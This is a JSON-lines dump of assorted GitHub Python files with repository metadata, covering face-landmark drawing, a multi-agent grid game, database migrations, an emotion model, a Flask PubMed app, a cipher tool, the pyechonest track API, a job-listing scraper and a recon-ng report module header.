b[0]\n cy = b[1] + 12\n cv2.putText(old_image, text, (cx, cy),\n cv2.FONT_HERSHEY_DUPLEX, 0.5, (255, 255, 255))\n\n print(b[0], b[1], b[2], b[3], b[4])\n # b[5]-b[14] are the cordinate of facial landmarks\n cv2.circle(old_image, (b[5], b[6]), 1, (0, 0, 255), 4)\n cv2.circle(old_image, (b[7], b[8]), 1, (0, 255, 255), 4)\n cv2.circle(old_image, (b[9], b[10]), 1, (255, 0, 255), 4)\n cv2.circle(old_image, (b[11], b[12]), 1, (0, 255, 0), 4)\n cv2.circle(old_image, (b[13], b[14]), 1, (255, 0, 0), 4)\n return old_image\n","repo_name":"Ideal-maths/PupilFace","sub_path":"retinaface.py","file_name":"retinaface.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"1240325781","text":"\"\"\"\nUsing Reinforcement learning algorithm.\nmodel is DQN_brain\n\n\"\"\"\n\nfrom war_real import *\n# import matplotlib.pyplot as plt\nimport csv\nimport pandas as pd\n\nMAP_H=6\nMAP_W=6\n\n\nAction_Space=['u','d','l','r','s']\n\n\ndef cmt_light(my_map,x,y):\n dis_to_blue=[]\n for i in range(my_map.blue_num):\n if my_map.blue_army[i].life!='live':\n dis=my_map.map_w*my_map.map_h\n else:\n dis=abs(x-my_map.blue_army[i].x)+\\\n abs(y-my_map.blue_army[i].y)\n dis_to_blue.append(dis)\n blue_target=dis_to_blue.index(min(dis_to_blue))\n print(blue_target)\n x_b=my_map.blue_army[blue_target].x\n y_b=my_map.blue_army[blue_target].y\n direction_x=np.sign(x-x_b)\n direction_y=np.sign(y-y_b)\n if direction_x==-1 and direction_y==-1:\n action=np.random.choice(['d','r','d','r','d','r','u','l'])\n elif direction_x==1 and direction_y==1:\n action=np.random.choice(['u','l','u','l','u','l','d','r'])\n elif direction_x==1 and direction_y==-1:\n action=np.random.choice(['d','l','d','l','d','l','u','r'])\n elif direction_x==-1 and direction_y==1:\n action=np.random.choice(['u','r','u','r','u','r','d','l'])\n\n elif direction_x==0 and direction_y==1:\n action=np.random.choice(['u','u','u','u','u','u','l','r'])\n elif direction_x==0 and direction_y==-1:\n action=np.random.choice(['d','d','d','d','d','d','l','r'])\n elif direction_x==1 and direction_y==0:\n action=np.random.choice(['l','l','l','l','l','l','u','d'])\n elif direction_x==-1 and direction_y==0:\n action=np.random.choice(['r','r','r','r','r','r','u','d'])\n else:\n action=np.random.choice(Action_Space)\n return action\n\ndef cmt_light_blue(my_map,x,y):\n dis_to_red=[]\n for i in range(my_map.red_num):\n if my_map.red_army[i].life!='live':\n dis=my_map.map_w*my_map.map_h\n else:\n dis=abs(x-my_map.red_army[i].x)+\\\n abs(y-my_map.red_army[i].y)\n dis_to_red.append(dis)\n red_target=dis_to_red.index(min(dis_to_red))\n print(red_target)\n x_b=my_map.red_army[red_target].x\n y_b=my_map.red_army[red_target].y\n direction_x=np.sign(x-x_b)\n direction_y=np.sign(y-y_b)\n if direction_x==-1 and direction_y==-1:\n action=np.random.choice(['d','r','d','r','d','r','u','l'])\n elif direction_x==1 and direction_y==1:\n action=np.random.choice(['u','l','u','l','u','l','d','r'])\n elif direction_x==1 and direction_y==-1:\n action=np.random.choice(['d','l','d','l','d','l','u','r'])\n elif direction_x==-1 and direction_y==1:\n action=np.random.choice(['u','r','u','r','u','r','d','l'])\n\n elif direction_x==0 and direction_y==1:\n action=np.random.choice(['u','u','u','u','u','u','l','r'])\n elif direction_x==0 and direction_y==-1:\n action=np.random.choice(['d','d','d','d','d','d','l','r'])\n elif direction_x==1 and direction_y==0:\n action=np.random.choice(['l','l','l','l','l','l','u','d'])\n elif direction_x==-1 and direction_y==0:\n action=np.random.choice(['r','r','r','r','r','r','u','d'])\n else:\n action=np.random.choice(Action_Space)\n return action\n\n\ndef move_game(my_map):\n step=0\n trace=[]\n while 1:\n # line = sys.stdin.readline()\n red_action=[]\n blue_action=[]\n if step==0:\n trace.append([my_map.red_army[0].x, my_map.red_army[0].y,\n my_map.red_army[1].x, my_map.red_army[1].y,\n my_map.red_army[2].x, my_map.red_army[2].y,\n my_map.red_army[3].x, my_map.red_army[3].y,\n my_map.blue_army[0].x, my_map.blue_army[0].y,\n my_map.blue_army[1].x, my_map.blue_army[1].y,\n my_map.blue_army[2].x, my_map.blue_army[2].y,\n my_map.blue_army[3].x, my_map.blue_army[3].y]\n )\n print(trace[-1])\n\n \"\"\"move action\"\"\"\n for i in range(my_map.blue_num):\n b=np.random.choice(Action_Space)\n # b = np.random.choice(['u', 'u', 'u','u', 'u'])\n blue_action.append(b)\n for i in range(my_map.red_num):\n a=cmt_light(my_map,my_map.red_army[i].x,my_map.red_army[i].y)\n red_action.append(a)\n \"\"\"move action\"\"\"\n my_map.move(red_action,blue_action)\n\n loc_x_r=[]\n loc_y_r=[]\n for agent_num in range (my_map.red_num):\n if my_map.red_army[agent_num].life=='live':\n loc_x_r.append(my_map.red_army[agent_num].x)\n loc_y_r.append(my_map.red_army[agent_num].y)\n else:\n loc_x_r.append(-1)\n loc_y_r.append(-1)\n\n loc_x_b = []\n loc_y_b = []\n for agent_num in range(my_map.blue_num):\n if my_map.blue_army[agent_num].life == 'live':\n loc_x_b.append(my_map.blue_army[agent_num].x)\n loc_y_b.append(my_map.blue_army[agent_num].y)\n else:\n loc_x_b.append(-1)\n loc_y_b.append(-1)\n\n trace.append([loc_x_r[0],loc_y_r[0],\n loc_x_r[1], loc_y_r[1],\n loc_x_r[2], loc_y_r[2],\n loc_x_r[3], loc_y_r[3],\n loc_x_b[0], loc_y_b[0],\n loc_x_b[1], loc_y_b[1],\n loc_x_b[2], loc_y_b[2],\n loc_x_b[3], loc_y_b[3],\n ]\n )\n print(trace[-1])\n reward_red, reward_blue, red_killed, blue_killed, done=my_map.step()\n if done:\n for i in range(len(trace)):\n print(trace[i])\n print('done',done)\n break\n time.sleep(0)\n step = step + 1\n return step\n\n\ndef update():\n for episode in range(500):\n step=move_game(my_map)\n print('step',step)\n\nif __name__==\"__main__\":\n\n my_map=WarMap4(MAP_W,MAP_H,4,4,True,False)\n\n if my_map.draw_pic:\n my_map.after(10,update)\n my_map.mainloop()\n else:\n update()","repo_name":"GeorgeDUT/multi_agent_game","sub_path":"real-robot-multi/robot_real.py","file_name":"robot_real.py","file_ext":"py","file_size_in_byte":6223,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"18374135378","text":"from distutils.version import LooseVersion\nimport sys\nimport service\n\n\nclass sqlUpdater(object):\n def __init__(self, engine, current_version):\n self.connection = engine.connect()\n self.current_version = current_version\n self.updated_version = current_version\n\n def compatibility_check(self):\n if self.current_version > service.ServiceModule.get_db_version():\n print(\"You cannot downgrade to a version of Insight with a database version below {0} as there will be\"\n \" database compatibility issues. Insight releases are forward compatible, but in this case\"\n \" only backward compatible to a release with database version {0}. If you wish to downgrade to an \"\n \"older version that uses a database version below {0} you must first delete your database file.\"\n .format(str(self.current_version)))\n sys.exit(1)\n\n def get_approval(self, changes):\n print(\"Insight Database Updater Warning: Certain updates modify the architecture of the database file that \"\n \"require your approval. \\nThis new update will make the following changes:\\n\\n\")\n print(changes + '\\n')\n resp = input(\"\\nProceed with these changes? Note: You will be unable to use this version of Insight unless you \"\n \"approve.[Y/N]: \").lower()\n if resp.startswith('y'):\n return\n elif resp.startswith('n'):\n print(\"No changes you were made. If you wish to continue using your database without changes then you must \"\n \"downgrade to an older, unsupported Insight release.\")\n sys.exit(1)\n else:\n print(\"Unknown response. No changes were made.\")\n sys.exit(1)\n\n def get_versions_higher(self):\n for i in dir(self):\n if i.startswith(\"sqlV\"):\n func = getattr(self, i)\n if LooseVersion(func.__doc__) > self.current_version:\n yield func\n\n def __execute_statements(self, statements):\n for i in statements:\n print('Executing statement: {}'.format(str(i)))\n self.connection.execute(i)\n\n def sqlV_0_12_1(self):\n \"\"\"v0.12.1\"\"\"\n for i in self.sqlV_0_12_0():\n yield i\n\n def sqlV_0_12_0(self):\n \"\"\"v0.12.0\"\"\"\n changes = \"- Delete all access tokens.\\n- Require users to readd their standing tokens.\\n+ Encrypt all \" \\\n \"new access tokens using a generated secret key.\"\n self.get_approval(changes)\n yield 'DROP TABLE IF EXISTS contacts_alliances;'\n yield 'DROP TABLE IF EXISTS contacts_corporations;'\n yield 'DROP TABLE IF EXISTS contacts_characters;'\n yield 'DROP TABLE IF EXISTS discord_tokens;'\n yield 'DROP TABLE IF EXISTS tokens;'\n\n def sqlV_1_1_0(self):\n \"\"\"v1.1.0\"\"\"\n yield 'ALTER TABLE discord_channels ADD appearance_id INTEGER DEFAULT 0 NOT NULL;'\n\n def sqlV_0_10_1(self):\n \"\"\"v0.10.1\"\"\"\n yield 'ALTER TABLE discord_enFeed ADD template_id INTEGER DEFAULT 0 NOT NULL;'\n yield 'ALTER TABLE discord_capRadar ADD template_id INTEGER DEFAULT 0 NOT NULL;'\n\n def sqlV_1_2_0(self):\n \"\"\"v1.2.0\"\"\"\n yield 'ALTER TABLE discord_enFeed ADD minValue FLOAT DEFAULT 0.0 NOT NULL;'\n\n def sqlV_1_3_0(self):\n \"\"\"v1.3.0\"\"\"\n yield 'CREATE INDEX ix_attackers_kill_id on attackers (kill_id);'\n\n def sqlV_2_1_0(self):\n \"\"\"v2.1.0\"\"\"\n yield 'CREATE INDEX ix_regions_name on regions (name);'\n yield 'CREATE INDEX ix_constellations_name on constellations (name);'\n yield 'CREATE INDEX ix_categories_name on categories (name);'\n yield 'CREATE INDEX ix_groups_name on groups (name);'\n yield 'CREATE INDEX ix_types_type_name on types (type_name);'\n\n def sqlV_2_2_0(self):\n \"\"\"v2.2.0\"\"\"\n yield \"alter table discord_channels add mention VARCHAR(9) NOT NULL DEFAULT 'noMention' constraint mention_method check (mention IN ('noMention', 'here', 'everyone'));\"\n yield 'alter table discord_channels add mention_every FLOAT NOT NULL DEFAULT 15.0;'\n\n def sqlV_2_3_0(self):\n \"\"\"v2.3.0\"\"\"\n yield \"alter table discord_channels add modification_lock BOOLEAN NOT NULL DEFAULT 0 check (modification_lock IN (0, 1));\"\n\n def sqlV_2_4_0(self):\n \"\"\"v2.4.0\"\"\"\n yield \"ALTER TABLE tokens ADD error_count INTEGER DEFAULT 0 NOT NULL;\"\n\n def sqlV_2_5_0(self):\n \"\"\"v2.5.0\"\"\"\n yield 'CREATE INDEX IF NOT EXISTS ix_kills_killmail_time on kills (\"killmail_time\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_kills_solar_system_id on kills (\"solar_system_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_kills_locationID on kills (\"locationID\");'\n\n yield 'CREATE INDEX IF NOT EXISTS ix_attackers_character_id on attackers (\"character_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_attackers_corporation_id on attackers (\"corporation_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_attackers_alliance_id on attackers (\"alliance_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_attackers_ship_type_id on attackers (\"ship_type_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_attackers_weapon_type_id on attackers (\"weapon_type_id\");'\n\n yield 'CREATE INDEX IF NOT EXISTS ix_systems_constellation_id on systems (\"constellation_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_constellations_region_id on constellations (\"region_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_locations_typeID on locations (\"typeID\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_locations_groupID on locations (\"groupID\");'\n\n yield 'CREATE INDEX IF NOT EXISTS ix_types_group_id on types (\"group_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_groups_category_id on groups (\"category_id\");'\n\n yield 'CREATE INDEX IF NOT EXISTS ix_victims_character_id on victims (\"character_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_victims_corporation_id on victims (\"corporation_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_victims_alliance_id on victims (\"alliance_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_victims_ship_type_id on victims (\"ship_type_id\");'\n\n def sqlV_2_6_0(self):\n \"\"\"v2.6.0\"\"\"\n yield 'UPDATE kills SET \"locationID\" = NULL WHERE \"locationID\" = 0;'\n\n def update_all(self):\n \"\"\"Updates tables, returning the latest successful updated version\"\"\"\n self.compatibility_check()\n error = False\n for i in self.get_versions_higher():\n try:\n results = list(i())\n print('Updating database to version: {}'.format(i.__doc__))\n self.__execute_statements(results)\n self.updated_version = i.__doc__\n print('DB patch ok')\n except Exception as ex:\n print(ex)\n error = True\n break\n return (str(self.updated_version), error)\n\n","repo_name":"EVEInsight/Insight","sub_path":"Insight/database/db_tables/sqlUpdater.py","file_name":"sqlUpdater.py","file_ext":"py","file_size_in_byte":7032,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"66"} +{"seq_id":"27930656276","text":"import torch \nimport torch.nn as nn \nimport torch.nn.functional as F\n\nclass Emotic(nn.Module):\n ''' Emotic Model'''\n def __init__(self, num_context_features, num_body_features):\n n_feature_hidden = 1024\n super(Emotic,self).__init__()\n self.num_context_features = num_context_features\n self.num_body_features = num_body_features\n self.fc1 = nn.Linear((self.num_context_features + num_body_features), n_feature_hidden)\n self.bn1 = nn.BatchNorm1d(n_feature_hidden)\n self.fc2 = nn.Linear(1024, 512)\n self.fc_cat = nn.Linear(512, 26)\n self.fc_cont = nn.Linear(512, 3)\n self.relu = nn.ReLU()\n\n \n def forward(self, x_context, x_body):\n context_features = x_context.view(-1, self.num_context_features)\n body_features = x_body.view(-1, self.num_body_features)\n fuse_features = torch.cat((context_features, body_features), 1)\n fuse_out = self.fc1(fuse_features)\n fuse_out = self.bn1(fuse_out)\n fuse_out = self.relu(fuse_out)\n fuse_out = F.dropout(fuse_out, p=0.5, training=self.training) \n fuse_out = self.fc2(fuse_out)\n fuse_out = F.dropout(fuse_out, p=0.5, training=self.training) \n cat_out = self.fc_cat(fuse_out)\n cont_out = self.fc_cont(fuse_out)\n return cat_out, cont_out\n","repo_name":"votnhan/context_based_emotion","sub_path":"emotic.py","file_name":"emotic.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13519981962","text":"from flask import Flask, render_template, request, Response, redirect, url_for\nfrom flask import send_file\nfrom datetime import date\nimport datetime\nfrom openpyxl import load_workbook\nimport io\nimport pandas as pd\nimport xlsxwriter\n\nimport pubmed_search\n\napp = Flask(__name__)\napp.secret_key = 'secret'\n\n\n@app.route('/')\ndef search_select():\n return render_template('index.html')\n\n@app.route('/retry')\ndef search_retry():\n return render_template('resubmit.html')\n\n@app.route('/result', methods=['POST'])\ndef result():\n start = request.form.get(\"start-date\")\n end = request.form.get(\"end-date\")\n authors = request.form.get(\"authors\")\n terms = request.form.get(\"terms\")\n ccsg = request.form.get(\"ccsg\")\n if not start or not end or not authors or not terms or not ccsg:\n return redirect(url_for('search_retry'))\n df = pubmed_search.main(start, end)\n dfName = start + \"TO\" + end + \".xlsx\"\n df.to_excel('/Users/kgovid/PycharmProjects/jaxPublicationClassifier1/' + dfName, index=False)\n return render_template(\"simple.html\", dataframe=df.to_html(), start=start, end=end)\n\n\n@app.route('/downloadFile//', methods=[\"POST\", \"GET\"])\ndef download_file(start, end):\n start = start\n end = end\n dfName = start + \"TO\" + end + \".xlsx\"\n print(dfName)\n directory = dfName\n print(directory)\n return send_file(filename_or_fp=directory,\n as_attachment=True)\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0')\n","repo_name":"dhatchi711/jaxPublicationClassifier","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35834831301","text":"\"\"\"Program for encoding and decoding messages with basic ciphers\"\"\"\nfrom crypto import atbash\nfrom crypto import rail\nfrom crypto import polybius\n\nif __name__ == '__main__':\n\n atb_cipher = atbash.Atbash()\n rail_cipher = rail.Rail()\n polybius_cipher = polybius.Polybius()\n\n secure = rail_cipher.encrypt(text='')\n\n insecure = rail_cipher.decrypt(text=secure)\n\n app_on = ''\n\n print('Welcome to the magic Cipho-Matic!')\n while app_on.lower() != 'n':\n\n select = 0\n selector = input(\n 'Select a Cipher\\n\\n1 - Atbash\\n'\n '2 - Transposition Rail\\n3 - Polybius\\n\\n-- '\n )\n\n enc_or_dec = 'Would you like to 1 - encode or 2 - decipher? : '\n\n if selector == '1':\n select = input(enc_or_dec)\n if select == '1':\n keyword = input('What is the message? : ')\n print(atb_cipher.encrypt(keyword))\n if select == '2':\n keyword = input('What is the code? : ')\n print(atb_cipher.decrypt(keyword))\n\n if selector == '2':\n select = input(enc_or_dec)\n if select == '1':\n keyword = input('What is the message? : ')\n print(rail_cipher.encrypt(keyword))\n if select == '2':\n keyword = input('What is the code? : ')\n print(rail_cipher.decrypt(keyword))\n\n if selector == '3':\n select = input(enc_or_dec)\n if select == '1':\n keyword = input('What is the message? : ')\n print(polybius_cipher.encrypt(keyword))\n if select == '2':\n keyword = input('What is the code? : ')\n print(polybius_cipher.decrypt(keyword))\n\n input('Press enter to continue\\n\\n\\n')\n\n app_on = input('Would you like to work on another message?'\n ' y/n : \\n\\n -- ')\n","repo_name":"MisterAJ/ciphers","sub_path":"cipher_app.py","file_name":"cipher_app.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3077084540","text":"import urllib2\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nimport hashlib\nfrom proxies import TrackProxy\nimport util\nimport time\n\n# Seconds to wait for asynchronous track/upload or track/analyze jobs to complete.\nDEFAULT_ASYNC_TIMEOUT = 60\n\nclass Track(TrackProxy):\n \"\"\"\n Represents an audio file and its analysis from The Echo Nest.\n All public methods in this module return Track objects.\n\n Depending on the information available, a Track may have some or all of the\n following attributes:\n\n acousticness float: confidence the track is \"acoustic\" (0.0 to 1.0)\n analysis_url URL to retrieve the complete audio analysis (time expiring)\n analyzer_version str: e.g. '3.01a'\n artist str or None: artist name\n artist_id Echo Nest ID of artist, if known\n danceability float: relative danceability (0.0 to 1.0)\n duration float: length of track in seconds\n energy float: relative energy (0.0 to 1.0)\n id str: Echo Nest Track ID, e.g. 'TRTOBXJ1296BCDA33B'\n key int: between 0 (key of C) and 11 (key of B flat) inclusive\n liveness float: confidence the track is \"live\" (0.0 to 1.0)\n loudness float: overall loudness in decibels (dB)\n md5 str: 32-character checksum of the original audio file, if available\n mode int: 0 (major) or 1 (minor)\n song_id The Echo Nest song ID for the track, if known\n speechiness float: likelihood the track contains speech (0.0 to 1.0)\n status str: analysis status, e.g. 'complete'\n tempo float: overall BPM (beats per minute)\n time_signature beats per measure (e.g. 3, 4, 5, 7)\n title str or None: song title\n valence float: a range from negative to positive emotional content (0.0 to 1.0)\n\n The following attributes are available only after calling Track.get_analysis():\n \n analysis_channels int: the number of audio channels used during analysis\n analysis_sample_rate int: the sample rate used during analysis\n bars list of dicts: timing of each measure\n beats list of dicts: timing of each beat\n codestring ENMFP code string\n code_version version of ENMFP code generator\n decoder audio decoder used by the analysis (e.g. ffmpeg)\n echoprintstring fingerprint string using Echoprint (http://echoprint.me)\n echoprint_version version of Echoprint code generator\n end_of_fade_in float: time in seconds track where fade-in ends\n key_confidence float: confidence that key detection was accurate\n meta dict: other track metainfo (bitrate, album, genre, etc.)\n mode_confidence float: confidence that mode detection was accurate\n num_samples int: total samples in the decoded track\n offset_seconds unused, always 0\n sample_md5 str: 32-character checksum of the decoded audio file\n samplerate the audio sample rate detected in the file\n sections list of dicts: larger sections of song (chorus, bridge, solo, etc.)\n segments list of dicts: timing, pitch, loudness and timbre for each segment\n start_of_fade_out float: time in seconds where fade out begins\n synchstring string providing synchronization points throughout the track\n synch_version version of the synch string algorithm\n tatums list of dicts: the smallest metrical unit (subdivision of a beat)\n tempo_confidence float: confidence that tempo detection was accurate\n time_signature_confidence float: confidence that time_signature detection was accurate\n \n Each bar, beat, section, segment and tatum has a start time, a duration, and a confidence,\n in addition to whatever other data is given.\n\n Examples:\n\n >>> t = track.track_from_id('TRJSEBQ1390EC0B548')\n >>> t\n \n\n >>> t = track.track_from_md5('96fa0180d225f14e9f8cbfffbf5eb81d')\n >>> t\n \n >>>\n\n >>> t = track.track_from_filename('Piano Man.mp3')\n >>> t.meta\n AttributeError: 'Track' object has no attribute 'meta'\n >>> t.get_analysis()\n >>> t.meta\n {u'album': u'Piano Man',\n u'analysis_time': 8.9029500000000006,\n u'analyzer_version': u'3.1.3',\n u'artist': u'Billy Joel',\n u'bitrate': 160,\n u'detailed_status': u'OK',\n u'filename': u'/tmp/tmphrBQL9/fd2b524958548e7ecbaf758fb675fab1.mp3',\n u'genre': u'Soft Rock',\n u'sample_rate': 44100,\n u'seconds': 339,\n u'status_code': 0,\n u'timestamp': 1369400122,\n u'title': u'Piano Man'}\n >>>\n \"\"\"\n def __repr__(self):\n try:\n return \"<%s - %s>\" % (self._object_type.encode('utf-8'), self.title.encode('utf-8'))\n except AttributeError:\n # the title is None\n return \"< Track >\"\n\n def __str__(self):\n return self.title.encode('utf-8')\n \n def get_analysis(self):\n \"\"\" Retrieve the detailed analysis for the track, if available. \n Raises Exception if unable to create the detailed analysis. \"\"\"\n if self.analysis_url:\n try:\n # Try the existing analysis_url first. This expires shortly\n # after creation.\n try:\n json_string = urllib2.urlopen(self.analysis_url).read()\n except urllib2.HTTPError:\n # Probably the analysis_url link has expired. Refresh it.\n param_dict = dict(id = self.id)\n new_track = _profile(param_dict, DEFAULT_ASYNC_TIMEOUT)\n if new_track and new_track.analysis_url:\n self.analysis_url = new_track.analysis_url\n json_string = urllib2.urlopen(self.analysis_url).read()\n else:\n raise Exception(\"Failed to create track analysis.\")\n\n analysis = json.loads(json_string)\n analysis_track = analysis.pop('track', {})\n self.__dict__.update(analysis)\n self.__dict__.update(analysis_track)\n except Exception: #pylint: disable=W0702\n # No detailed analysis found.\n raise Exception(\"Failed to create track analysis.\")\n else:\n raise Exception(\"Failed to create track analysis.\")\n\n\ndef _wait_for_pending_track(trid, timeout):\n status = 'pending'\n param_dict = {'id': trid}\n param_dict['format'] = 'json'\n param_dict['bucket'] = 'audio_summary'\n start_time = time.time()\n end_time = start_time + timeout\n # counter for seconds to wait before checking track profile again.\n timeout_counter = 3\n while status == 'pending' and time.time() < end_time:\n time.sleep(timeout_counter)\n result = util.callm('track/profile', param_dict)\n status = result['response']['track']['status'].lower()\n # Slowly increment to wait longer each time.\n timeout_counter += timeout_counter / 2\n return result\n\ndef _track_from_response(result, timeout):\n \"\"\"\n This is the function that actually creates the track object\n \"\"\"\n response = result['response']\n status = response['track']['status'].lower()\n\n if status == 'pending':\n # Need to wait for async upload or analyze call to finish.\n result = _wait_for_pending_track(response['track']['id'], timeout)\n response = result['response']\n status = response['track']['status'].lower()\n\n if not status == 'complete':\n track_id = response['track']['id']\n if status == 'pending':\n raise Exception('%s: the operation didn\\'t complete before the timeout (%d secs)' %\n (track_id, timeout))\n else:\n raise Exception('%s: there was an error analyzing the track, status: %s' % (track_id, status))\n else:\n # track_properties starts as the response dictionary.\n track_properties = response['track']\n # 'id' and 'md5' are separated to construct the Track object.\n identifier = track_properties.pop('id')\n md5 = track_properties.pop('md5', None) # tracks from song api calls will not have an md5\n # Pop off the audio_summary dict and make those keys attributes\n # of the Track. This includes things like tempo, energy, and loudness.\n track_properties.update(track_properties.pop('audio_summary'))\n return Track(identifier, md5, track_properties)\n\ndef _upload(param_dict, timeout, data):\n \"\"\"\n Calls upload either with a local audio file,\n or a url. Returns a track object.\n \"\"\"\n param_dict['format'] = 'json'\n param_dict['wait'] = 'true'\n param_dict['bucket'] = 'audio_summary'\n result = util.callm('track/upload', param_dict, POST = True, socket_timeout = 300, data = data)\n return _track_from_response(result, timeout)\n\ndef _profile(param_dict, timeout):\n param_dict['format'] = 'json'\n param_dict['bucket'] = 'audio_summary'\n result = util.callm('track/profile', param_dict)\n return _track_from_response(result, timeout)\n\n\n\"\"\" Below are convenience functions for creating Track objects, you should use them \"\"\"\n\ndef _track_from_data(audio_data, filetype, timeout):\n param_dict = {}\n param_dict['filetype'] = filetype\n return _upload(param_dict, timeout, audio_data)\n\ndef track_from_file(file_object, filetype, timeout=DEFAULT_ASYNC_TIMEOUT, force_upload=False):\n \"\"\"\n Create a track object from a file-like object.\n\n NOTE: Does not create the detailed analysis for the Track. Call\n Track.get_analysis() for that.\n\n Args:\n file_object: a file-like Python object\n filetype: the file type. Supported types include mp3, ogg, wav, m4a, mp4, au\n force_upload: skip the MD5 shortcut path, force an upload+analysis\n Example:\n >>> f = open(\"Miaow-01-Tempered-song.mp3\")\n >>> t = track.track_from_file(f, 'mp3')\n >>> t\n < Track >\n >>>\n \"\"\"\n if not force_upload:\n try:\n # Check if this file has already been uploaded.\n # This is much faster than uploading.\n md5 = hashlib.md5(file_object.read()).hexdigest()\n return track_from_md5(md5)\n except util.EchoNestAPIError:\n # Fall through to do a fresh upload.\n pass\n\n file_object.seek(0)\n return _track_from_data(file_object.read(), filetype, timeout)\n\ndef track_from_filename(filename, filetype = None, timeout=DEFAULT_ASYNC_TIMEOUT, force_upload=False):\n \"\"\"\n Create a track object from a filename.\n\n NOTE: Does not create the detailed analysis for the Track. Call\n Track.get_analysis() for that.\n\n Args:\n filename: A string containing the path to the input file.\n filetype: A string indicating the filetype; Defaults to None (type determined by file extension).\n force_upload: skip the MD5 shortcut path, force an upload+analysis\n\n Example:\n >>> t = track.track_from_filename(\"Miaow-01-Tempered-song.mp3\")\n >>> t\n < Track >\n >>>\n \"\"\"\n filetype = filetype or filename.split('.')[-1]\n file_object = open(filename, 'rb')\n result = track_from_file(file_object, filetype, timeout, force_upload)\n file_object.close()\n return result\n\ndef track_from_url(url, timeout=DEFAULT_ASYNC_TIMEOUT):\n \"\"\"\n Create a track object from a public http URL.\n\n NOTE: Does not create the detailed analysis for the Track. Call\n Track.get_analysis() for that.\n\n Args:\n url: A string giving the URL to read from. This must be on a public machine accessible by HTTP.\n\n Example:\n >>> t = track.track_from_url(\"http://www.miaowmusic.com/mp3/Miaow-01-Tempered-song.mp3\")\n >>> t\n < Track >\n >>>\n\n \"\"\"\n param_dict = dict(url = url)\n return _upload(param_dict, timeout, data=None)\n\ndef track_from_id(identifier, timeout=DEFAULT_ASYNC_TIMEOUT):\n \"\"\"\n Create a track object from an Echo Nest track ID.\n\n NOTE: Does not create the detailed analysis for the Track. Call\n Track.get_analysis() for that.\n\n Args:\n identifier: A string containing the ID of a previously analyzed track.\n\n Example:\n >>> t = track.track_from_id(\"TRWFIDS128F92CC4CA\")\n >>> t\n \n >>>\n \"\"\"\n param_dict = dict(id = identifier)\n return _profile(param_dict, timeout)\n\ndef track_from_md5(md5, timeout=DEFAULT_ASYNC_TIMEOUT):\n \"\"\"\n Create a track object from an md5 hash.\n\n NOTE: Does not create the detailed analysis for the Track. Call\n Track.get_analysis() for that.\n\n Args:\n md5: A string 32 characters long giving the md5 checksum of a track already analyzed.\n\n Example:\n >>> t = track.track_from_md5('b8abf85746ab3416adabca63141d8c2d')\n >>> t\n \n >>>\n \"\"\"\n param_dict = dict(md5 = md5)\n return _profile(param_dict, timeout)\n","repo_name":"echonest/pyechonest","sub_path":"pyechonest/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":13589,"program_lang":"python","lang":"en","doc_type":"code","stars":661,"dataset":"github-code","pt":"66"} +{"seq_id":"13899428057","text":"from scrapy import Spider\r\n\r\nfrom ..items import RequimentItem\r\nimport scrapy\r\n\r\n\r\nclass CareerbuilderSpider(Spider):\r\n name = 'devwork'\r\n allowed_domains = ['devwork.vn']\r\n start_urls = [\r\n 'https://devwork.vn/job/search?name-seach=&category-jod=0&location-jod=1&wage-job-from=&wage-job-to'\r\n '=&workingfrom_job=1&_token=4sCfy1EVjFElJayDIuzSBA139ENtPuoHmozjr9eB&page=23',\r\n ]\r\n\r\n def parse(self, response):\r\n all_job = response.xpath('//div[@class=\"job-list-content\"]')\r\n\r\n for job in all_job:\r\n job_url = job.xpath('./h4/a/@href').extract_first()\r\n\r\n yield scrapy.Request(job_url, callback=self.parse_job)\r\n\r\n next_page_url = response.xpath('//li[@class=\"page-item\"]/a/@href').extract_first()\r\n yield scrapy.Request(next_page_url, callback=self.parse)\r\n\r\n def parse_job(self, response):\r\n item = RequimentItem()\r\n item['title'] = response.xpath('normalize-space(/html/body/section[1]/div/div/div/div[2]/h1/text())').extract()\r\n item['mo_ta'] = response.xpath('//div[@class=\"jod-detail-content-request col-md-12\"]/text()').extract()\r\n if item['mo_ta'] is None:\r\n item['mo_ta'] = response.xpath(\r\n '//div[@class=\"jod-detail-content-request col-md-12\"]/p/span/text()').extract()\r\n item['yeu_cau'] = response.xpath('/html/body/section[2]/div/div/div[1]/div[4]/div/text()').extract()\r\n if item['yeu_cau'] is None:\r\n item['yeu_cau'] = response.xpath('/html/body/section[2]/div/div/div[1]/div[4]/div/p/span/text()').extract()\r\n\r\n yield item\r\n","repo_name":"nhpquy/code_trainer","sub_path":"Scrapy/requiment/requiment/spiders/devwork.py","file_name":"devwork.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2842965771","text":"from recon.core.module import BaseModule\nimport os\nimport xlsxwriter\n\nclass Module(BaseModule):\n\n meta = {\n 'name': 'XLSX File Creator',\n 'author': 'Tim Tomes (@LaNMaSteR53)',\n 'description': 